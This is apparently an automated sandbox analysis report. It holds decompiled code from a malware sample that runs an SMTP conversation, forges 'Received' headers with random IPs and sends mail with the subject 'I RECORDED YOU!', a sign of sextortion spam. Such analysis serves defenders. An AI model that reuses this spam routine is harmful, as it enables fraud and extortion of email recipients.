                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bbf
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1bcc
                                                                                                                                                                                                                                                                                    0x00ea1bdb
                                                                                                                                                                                                                                                                                    0x00ea1be2
                                                                                                                                                                                                                                                                                    0x00ea1be8
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1bf1
                                                                                                                                                                                                                                                                                    0x00ea1bff
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c37
                                                                                                                                                                                                                                                                                    0x00ea1c3d
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c46
                                                                                                                                                                                                                                                                                    0x00ea1c4d
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1ccf
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cf2
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d0a
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d17
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d28
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d39
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d4a
                                                                                                                                                                                                                                                                                    0x00ea1d4f
                                                                                                                                                                                                                                                                                    0x00ea1d6c
                                                                                                                                                                                                                                                                                    0x00ea1d73
                                                                                                                                                                                                                                                                                    0x00ea1d79
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d82
                                                                                                                                                                                                                                                                                    0x00ea1d90
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dac
                                                                                                                                                                                                                                                                                    0x00ea1dc5
                                                                                                                                                                                                                                                                                    0x00ea1dce
                                                                                                                                                                                                                                                                                    0x00ea1ddc
                                                                                                                                                                                                                                                                                    0x00ea1de3
                                                                                                                                                                                                                                                                                    0x00ea1de9
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1df9
                                                                                                                                                                                                                                                                                    0x00ea1e00
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e25
                                                                                                                                                                                                                                                                                    0x00ea1e2c
                                                                                                                                                                                                                                                                                    0x00ea1e32
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e3b
                                                                                                                                                                                                                                                                                    0x00ea1e49
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e65
                                                                                                                                                                                                                                                                                    0x00ea1e75
                                                                                                                                                                                                                                                                                    0x00ea1e7b
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e84
                                                                                                                                                                                                                                                                                    0x00ea1e8b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1eb8
                                                                                                                                                                                                                                                                                    0x00ea1ebf
                                                                                                                                                                                                                                                                                    0x00ea1ec5
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ece
                                                                                                                                                                                                                                                                                    0x00ea1edc
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1ef8
                                                                                                                                                                                                                                                                                    0x00ea1f0b
                                                                                                                                                                                                                                                                                    0x00ea1f11
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f1a
                                                                                                                                                                                                                                                                                    0x00ea1f21
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f44
                                                                                                                                                                                                                                                                                    0x00ea1f4b
                                                                                                                                                                                                                                                                                    0x00ea1f66
                                                                                                                                                                                                                                                                                    0x00ea1f74
                                                                                                                                                                                                                                                                                    0x00ea1f7b
                                                                                                                                                                                                                                                                                    0x00ea1f81
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f8a
                                                                                                                                                                                                                                                                                    0x00ea1f98
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbb
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
                                                                                                                                                                                                                                                                                    0x00ea1fec
                                                                                                                                                                                                                                                                                    0x00ea2008
                                                                                                                                                                                                                                                                                    0x00ea2015
                                                                                                                                                                                                                                                                                    0x00ea2030
                                                                                                                                                                                                                                                                                    0x00ea2044
                                                                                                                                                                                                                                                                                    0x00ea2051
                                                                                                                                                                                                                                                                                    0x00ea2080
                                                                                                                                                                                                                                                                                    0x00ea208d
                                                                                                                                                                                                                                                                                    0x00ea20bc
                                                                                                                                                                                                                                                                                    0x00ea20c9
                                                                                                                                                                                                                                                                                    0x00ea20e1
                                                                                                                                                                                                                                                                                    0x00ea20e5
                                                                                                                                                                                                                                                                                    0x00ea20ef
                                                                                                                                                                                                                                                                                    0x00ea2104
                                                                                                                                                                                                                                                                                    0x00ea211f
                                                                                                                                                                                                                                                                                    0x00ea2133
                                                                                                                                                                                                                                                                                    0x00ea2140
                                                                                                                                                                                                                                                                                    0x00ea216f
                                                                                                                                                                                                                                                                                    0x00ea217c
                                                                                                                                                                                                                                                                                    0x00ea21ab
                                                                                                                                                                                                                                                                                    0x00ea21b8
                                                                                                                                                                                                                                                                                    0x00ea21d0
                                                                                                                                                                                                                                                                                    0x00ea21de
                                                                                                                                                                                                                                                                                    0x00ea21e9
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea21e0
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea20f1
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fee
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fcb
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1fa8
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1f38
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1eec
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1ea2
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e59
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1e10
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00ea1da0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea21f2
                                                                                                                                                                                                                                                                                    0x00ea21f9
                                                                                                                                                                                                                                                                                    0x00ea21fd
                                                                                                                                                                                                                                                                                    0x00ea2205
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1af1
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1acb
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea2211
                                                                                                                                                                                                                                                                                    0x00ea221a
                                                                                                                                                                                                                                                                                    0x00ea2223
                                                                                                                                                                                                                                                                                    0x00ea222d
                                                                                                                                                                                                                                                                                    0x00ea2239
                                                                                                                                                                                                                                                                                    0x00ea2239

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: lstrlenA.KERNEL32(?), ref: 00EA112D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA1120: send.WS2_32(?,?,000000FF,00000000), ref: 00EA1144
                                                                                                                                                                                                                                                                                    • shutdown.WS2_32(000000FF,00000002), ref: 00EA2223
                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 00EA222D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: closesocketlstrlensendshutdown
                                                                                                                                                                                                                                                                                    • String ID: DATA
                                                                                                                                                                                                                                                                                    • API String ID: 317823648-550793329
                                                                                                                                                                                                                                                                                    • Opcode ID: 1fdd77924b888b346bdbebd19f02e98281936852a71c2655c93761f3e1535455
                                                                                                                                                                                                                                                                                    • Instruction ID: fbaafbc2f7a8fd60df2fd6efea94187d56d5fd05c62cd322d095bba2dfbdbbc8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fdd77924b888b346bdbebd19f02e98281936852a71c2655c93761f3e1535455
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 700171B5D04218DFCF10CBE4DC49BEEB7B4BB5E348F0052A9EA157A291E7786944CB21
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 309 ea21f2-ea2205 call ea1120 312 ea220c 309->312 314 ea1a9a-ea1a9e 312->314 315 ea2211-ea222d shutdown closesocket 312->315 314->315 317 ea1aa4-ea1ab4 call ea1160 314->317 318 ea2233-ea2239 315->318 320 ea1ab9-ea1ac9 317->320 321 ea1acb 320->321 322 ea1ad0-ea1aef call ea11c0 320->322 321->315 325 ea1af1 322->325 326 ea1af6-ea1b15 322->326 325->315 326->312 327 ea1b1b 326->327 327->312
                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E00EA21F2(void* __eflags) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t169;
                                                                                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                                                                                    				void* _t192;
                                                                                                                                                                                                                                                                                    				void* _t194;
                                                                                                                                                                                                                                                                                    				void* _t195;
                                                                                                                                                                                                                                                                                    				void* _t197;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					E00EA1120( *((intOrPtr*)(_t192 - 0x1c)), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                                    					 *(_t192 - 0x20) = 8;
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					while( *(_t192 - 0x20) != 0 &&  *(_t192 - 0x20) != 8) {
                                                                                                                                                                                                                                                                                    						_t169 = E00EA1160( *((intOrPtr*)(_t192 - 0x1c)), _t192 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                                    						_t197 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t192 - 0x90)) = _t169;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t192 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                                                    							 *((char*)(_t192 +  *((intOrPtr*)(_t192 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    							_t170 = E00EA11C0(_t192 - 0x490);
                                                                                                                                                                                                                                                                                    							_t195 = _t197 + 4;
                                                                                                                                                                                                                                                                                    							if(_t170 != 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *(_t192 - 0x718) =  *(_t192 - 0x20);
                                                                                                                                                                                                                                                                                    								 *(_t192 - 0x718) =  *(_t192 - 0x718) - 1;
                                                                                                                                                                                                                                                                                    								if( *(_t192 - 0x718) > 6) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								switch( *((intOrPtr*)( *(_t192 - 0x718) * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    									case 0:
                                                                                                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                                                                                                    										_push("ESMTP");
                                                                                                                                                                                                                                                                                    										if(StrStrA(_t192 - 0x490) == 0) {
                                                                                                                                                                                                                                                                                    											_t174 = wsprintfA(_t192 - 0x490, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x494) = _t174;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t177 = wsprintfA(_t192 - 0x490, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t198 = _t195 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x494) = _t177;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t176 = E00EA1120( *((intOrPtr*)(_t192 - 0x1c)), _t192 - 0x490,  *(_t192 - 0x494)); // executed
                                                                                                                                                                                                                                                                                    										_t195 = _t198 + 0xc;
                                                                                                                                                                                                                                                                                    										if(_t176 != 0) {
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x20) = 3;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t192 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 1:
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 2:
                                                                                                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 3:
                                                                                                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "RCPT TO: <%s>\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x49c) = __eax;
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x49c);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x49c)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 5;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 4:
                                                                                                                                                                                                                                                                                    										L22:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 5:
                                                                                                                                                                                                                                                                                    										L25:
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                                    										E00EA1320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__ebp - 0x710 = E00EA1490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                                    										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t59 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t63 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t67 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xd2;
                                                                                                                                                                                                                                                                                    										_t71 = __eax % 0xd2;
                                                                                                                                                                                                                                                                                    										E00EA1390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t71 + 1, _t67 + 1, _t63 + 1, _t59 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                                    											E00EA1320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    												__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    												if(__eax != 0) {
                                                                                                                                                                                                                                                                                    													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    													if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                                    														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    														__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    														if(__eax != 0) {
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                                    															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    															__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    															if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                                    																E00EA1320(__ecx, 6, __ecx) = E00EA1320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                                    																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    																__ecx =  *(__ebp - 0x714);
